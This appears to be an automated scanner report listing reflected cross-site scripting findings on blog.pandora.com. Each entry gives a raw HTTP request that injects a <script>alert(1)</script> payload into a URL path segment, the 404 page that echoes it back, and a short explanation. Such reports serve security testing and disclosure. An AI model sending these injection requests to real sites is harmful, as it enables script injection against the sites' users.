GET /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)</script>1d67bc84c6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 352 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)</script>5b0b1194bdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)</script>be7f68e6c8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)</script>64acfed229b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>0d232e15ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)</script>144240895da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)</script>2320b502118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)</script>5f361df41b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)</script>bc0dd599e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)</script>ae5fbffaaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)</script>11ad1856e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)</script>bbd3bee6ead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)</script>8413af64462 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)</script>35298219914 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)</script>0ea477101ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)</script>abd6920173d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)</script>09286fec01b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)</script>7ecc04df193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)</script>89fc3a9ebb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ was not found on this server.</p> ...[SNIP]...
